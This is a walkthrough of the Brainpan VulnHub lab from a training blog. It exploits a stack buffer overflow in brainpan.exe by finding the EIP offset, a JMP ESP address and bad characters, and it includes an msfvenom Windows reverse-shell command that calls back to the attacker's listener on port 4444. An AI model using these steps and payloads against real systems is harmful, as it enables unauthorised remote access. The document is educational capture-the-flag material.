VulnHub machines walkthrough series: Brainpan – Part 1
Continuing with our series on testing vulnerable virtual machines, in this article we will see a walkthrough of an interesting VulnHub machine called Brainpan. This is Part 1 of this article, where we will look into the getting the user-level reverse shell.
Note: For all these machines, I have used VMware Workstation to provision VMs. Kali Linux VM will be my attacking box. Also, the techniques used are solely for educational purposes. I am not responsible if the listed techniques are used against any other targets.
What should you learn next?
Brainpan walkthrough
Download Link: https://www.vulnhub.com/entry/brainpan-1,51/
VM Details – From the Author
- By using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.
- TL;DR: If something bad happens, it's not my fault.
- SETUP
-----
Brainpan has been tested and found to work on the following hypervisors:
- VMware Player 5.0.1
- VMWare Fusion 5.0
- VirtualBox 4.2.8Import Brainpan into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it's recommended you run it within a NAT or visible to the host OS only since it is vulnerable to attacks.
Walkthrough
1. Download the Brainpan VM from above link and provision it as a VM.
2. Following the routine from the series, let’s try to find the IP of this machine using netdiscover. Below, we can see that the IP address is discovered to be 192.168.213.133. [CLICK EACH IMAGE TO ENLARGE]
<<netdiscover -r 192.168.1.0/24>>
3. Let’s perform an nmap scan on this. Below are the results of the nmap scan, where port 9999 and http running on 10000 were detected.
<<nmap -sC -sV 192.168.213.133>>
4. Let’s start to dig what is inside them. Start with http one. I started gobuster at the back end as well and found a bin directory in which we can see that an .exe named brainpan is present. Since it is an .exe file, I need to evaluate the file in my Windows 7 lab machine.
5. Download brainpan.exe and drop it to the Windows 7 lab machine. Below we can see that brainpan.exe is running and waiting for connection on port 9999.
6. Looking into the strings into this .exe revealed use of some vulnerable functions, as we can see below.
<<strings brainpan.exe>>
7. As is done in the previous write-ups, let’s send a large buffer of As to the socket on 9999 and see what happens. Below, we can see that the .exe crashed. Looking into the Error report revealed that EIP is overwritten by our custom input (the buffer of As).
8. Before I proceed further, I see a string (“shitstorm”) embedded just alongside the other register. Tried it as the password for the .exe, but it failed.
<<nc 192.168.213.133 9999>>
9. Now let’s follow the same routing to exploit the buffer overflow as we have done previously in this series. To find the exact offset at which the current buffer of As are overwriting EIP, let’s use the pattern created from Kali and embed that into the script, as is shown below.
10. We can see that the new buffer has overwritten EIP at location 35724134.
11. Using the pattern offset from Kali, the offset position is found to be 524.
<<./pattern_offset.rb -q 35724134>>
12. As per the offset position found, let’s try to recreate our buffer as shown below. This will consist of 524 As, 4 Bs and rest Cs (out of 1000 characters in the original buffer).
13. After executing the above buffer, we can see that how cleanly As, Bs and Cs have overwritten the registers. An important point to note here is that the Bs have completely overwritten EIP, which means now we can control this location and use it to point to our buffer. We are going to place our malicious buffer in ESP, so we need an instruction such as JMP ESP to be placed in EIP so that it points to our buffer.
14. In order to overwrite the Bs with a constant location, we will use mona modules and locate the module which does not have flags such as ASLR. Below, we can see that brainpan.exe itself has all the flags turned off.
<<!mona modules>>
15. Looking further into the brainpan.exe, we found out that there is an instruction JMP ESP in the module brainpan. So let’s embed this instruction location in our script in place of Bs.
16. Below, we can see that we have the instruction address 0x311712F3 in little endian format in our script.
17. Below, we tested whether we will able to hit the address mentioned above and the value is present in EIP. It all appeared positive.
18. Now we need to test for a badchar. We create a unique buffer and pass that in place of Cs, as shown below:
19. If we observe the output carefully by looking into the contents of the ESP register, we can see that the ‘x00’ is the bad char and resulted in an access violation.
20. Now we have all the points collected to exploit the buffer overflow. We just need to create the payload now to get the reverse shell back. Below, we use msfvenom to generate the Windows reverse shell. But why Windows? Remember, we are doing all this testing in our Windows 7 lab machine.
<<msvenom -p windows/shell_reverse_tcp LPORT 4444 LHOST=192.168.213.131 -b “x00” -e x86/shikata_ga_nai -f c>>
21. Use the generated output as our buffer, replace it with the badchar buffer and execute it.
22. We can see that we have received the reverse shell back!
<<nc -nlvp 4444>>
23. Now we need to just change the IP of the machine to that of our Brainpan VM in the script and execute the script.
24. Below, we can see that we also got the reverse shell back from our Brainpan machine.
<<id>>
<</bin/bash -i>>
So we got the reverse shell back! In Part 2 of this machine, we will look into two different ways of gaining the root shell on this machine.
What should you learn next?
For more walkthroughs like this one, check out Security Ninja profile!
Enroll in an Ethical Hacking Boot Camp and earn two of the industry’s most respected certifications — guaranteed.
- CEH exam voucher
- PenTest+ exam voucher
- Exam Pass Guarantee
- Live online hacking training
In this Series
- VulnHub machines walkthrough series: Brainpan – Part 1
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness